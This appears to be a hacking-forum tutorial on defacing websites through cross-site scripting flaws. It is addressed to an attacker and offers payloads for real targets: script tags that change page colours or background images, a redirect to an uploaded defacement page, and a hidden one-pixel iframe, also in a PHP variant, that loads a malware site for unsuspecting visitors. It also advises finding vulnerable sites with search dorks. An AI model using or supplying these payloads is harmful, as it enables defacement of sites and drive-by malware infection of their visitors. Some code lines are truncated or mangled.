Defacing is one of the most common thing when the hacker found the vulnerability in website.
Defacing is changing the content the website to Hacker content.
Most of time, attacker use this technique to inform about the vulnerability to Admin.
i have some easiest methods to deface the XSS vulnerability sites.
1 - Script for changing the background Color of a website:
<script>document.body.bgColor="Black";</script>
use this in your target website as
Code:
http://www.site.com/<script&...y.bgColor="red";</script>
2 - Script for changing the background image of a website:
Code:
<script>document.body.background="http://your_image.jpg/";</script>
3 - Defacement Page with Pastehtml:
You just need to upload some defacement page to pastehtml.com and get the link.
When you find a XSS vulnerable site, then insert the script as :
Code:
<script>window.location="http://www.pastehtml.com/Your_Defacement_link";</script>
This script will redirect the page to your pastehtml defacement page.
4 - Defacing with iframe Injection
What is an IFrame Injection?
Using IFrame tag, The Attackers injects the malware contain website(links)
using Cross site Scripting in popular websites.Invisible IFrame Injection is a tag used to insert contents of a webpage inside another one.So if the usual visitors of that popular sites opens the website,it will redirect to malware contain website.
Malware will be loaded to your computer, now you are infected .
Using Iframe Injection, an attacker can inject advertisements inside any other websites,
insert malware infected site links, redirect to malware infected sites and more.
Iframe Injection Tutorial:
1. Find the Vulnerable websites using google dorks.
2. They test the vulnerability by inserting some iframe tag using the url.
3. Insert the Malicious Iframe code inside the webpage.
For Example:
he can insert this code using the url:
Code:
<iframe src=”http://malwarewebpages/web.html” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>
For php webpages:
Code:
echo “<iframe src=\”http://malwarewebpages/web.html\” width=1 height=1 style=\”visibility:hidden;position:absolute\”></iframe>”;
There are more methods to deface it..
Note: You can deface only persistent XSS vulnerable sites.
